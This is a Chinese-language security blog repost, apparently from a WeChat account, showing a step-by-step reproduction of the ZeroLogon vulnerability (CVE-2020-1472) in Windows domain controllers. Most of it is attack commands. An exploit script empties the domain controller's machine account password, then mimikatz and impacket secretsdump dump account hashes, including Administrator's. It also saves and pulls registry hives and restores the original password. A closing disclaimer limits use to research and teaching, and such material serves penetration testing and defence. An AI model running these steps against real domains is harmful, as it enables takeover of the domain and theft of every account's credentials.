漏洞描述:
当攻击者使用 Netlogon 远程协议 (MS-NRPC) 与域控制器建立易受攻击的 Netlogon 安全通道连接时,就会存在特权提升漏洞(也称为“Netlogon 特权提升漏洞”)。
利用过程:
1、将域控账户密码置换为空绕过认证。
2、导出/获取域控中的账户Hash。
3、恢复攻击之前的Hash。
影响版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)
POC:
1、脚本检测
域控机器名、IP
python3 zerologon_tester.py主机名IP 2、MIMIkaz检测
mimikaz可以检测也可以利用,无法域外利用时等情况可以考虑mimikaz上机利用。
privilege::debuglsadump::zerologon /target: /account:<主机名>$
EXP:
(1) 使用cve-2020-1472-exploit.py 将账户密码置换为空
python3 cve-2020-1472-exploit.py 主机名IP
(2) 这里导出Hash检查刚才重置账户的密码是否为空。用于验证是否攻击成功
impacket导出所有Hash
secretsdump.py 域/机器名$@目标IP -no-pass只导出域管Hash
proxychains4 secretsdump.py域/机器名$@IP -no-pass | grep 'Administrator'
(3) 恢复密码,备份注册表,并保存到本地,保存后删除备份的注册表
使用hash传递上域控执行命令
reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.savelget system.savelget sam.savelget security.savedel /f system.savedel /f sam.savedel /f security.save
(4) 获取恢复Hash需要的字段
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL$MACHINE.ACC:plain_password_hex:后的值为下一步恢复密码需要的值
(5) 恢复Hash
python3 reinstall_original_pw.py 机器名 IP d00b827a9......
(6) 检测是否成功还原
secretsdump.py 域/机器名$@目标IP -no-pass
原文始发于微信公众号(YongYe 安全实验室):CVE-2020-1472_ZeroLogon复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论